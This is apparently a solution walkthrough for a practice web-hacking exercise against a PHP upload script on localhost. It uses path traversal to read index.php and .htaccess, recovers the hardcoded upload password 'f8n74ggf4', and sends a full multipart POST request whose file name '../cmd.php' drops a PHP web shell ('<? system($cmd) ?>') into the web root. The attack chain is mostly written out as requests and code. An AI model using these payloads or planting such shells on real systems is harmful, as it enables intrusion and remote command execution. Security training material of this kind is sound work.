Task 2

Examine the available links to uploaded files:

• http://localhost/zadachi/2/upload.php?f=1.txt

• http://localhost/zadachi/2/upload.php?f=xxx.txt

After the second request, you could suppose there is a vulnerability allowing you to read any files. Indeed, it is the following:

http://localhost/zadachi/2/upload.php?f=../index.php

If you examine the HTML code of the page, you'll notice the source code of the  INDEX.PHP script. Analyze the contents of the  INDEX.PHP file.

The following line discloses the password necessary to upload files.

 if($pass<>'f8n74ggf4') die('Invalid password. The file was not uploaded.'); 

The password is f8n74ggf4 .

The knowledge of the password allows you to upload any file.

By default, files are uploaded into the . /upload/ directory inaccessible from a browser using HTTP. Access is restricted in the . htaccess file. You can obtain the contents of this file using the following request:

http://localhost/zadachi/2/upload.php?f=.htaccess

Analyze the  INDEX.PHP script further. There is a vulnerability in the following line:

 copy($userfile, "./upload/$userfile_name"); 

The vulnerability is that the $userfile and $userfile_name variables are used without filtration. Therefore, you can do the following:

1. Copy any file to the /UPLOAD/ directory by forging the $userfile values.

2. Load a file into any location by embedding the directory bypassing sequence into the file name in the header of the POST request.

3. Use the previous two methods to copy any file to any location.

To upload and execute the PHP shell code, the second method is most suitable. To implement it, you need to create a POST HTTP request to the server.

The request can look like the following:

 POST /zadachi/2/ HTTP/1.1    Host: localhost    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)    Gecko/20040803    Accept: */*    Accept-Language: en-us;q=0.5    Accept-Encoding: gzip, deflate    Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7    Keep-Alive: 3000    Connection: keep-alive    Referer: http://localhost/2/19.php    Content-Type: multipart/form-data;            boundary=---------------------------491299511942    Content-Length: 417    <empty line>    -----------------------------491299511942    Content-Disposition: form-data; name="pass"    <empty line>    f8n74ggf4    -----------------------------491299511942    Content-Disposition: form-data; name-MAX-FILE-SIZE"    <empty line>    10000    -----------------------------491299511942    Content-Disposition: form-data; name="userfile"; filename="../cmd.php"    Content-Type: text/plain    <empty line>    <? system($cmd) ?>    -----------------------------491299511942-- 

After you send this request to the server (e.g., by connecting directly to port 80 of the server using telnet ), the http://localhost/zadachi/2/cmd.php file will be created on the server. It will be available using HTTP.

The file is PHP shell code.

The task is solved .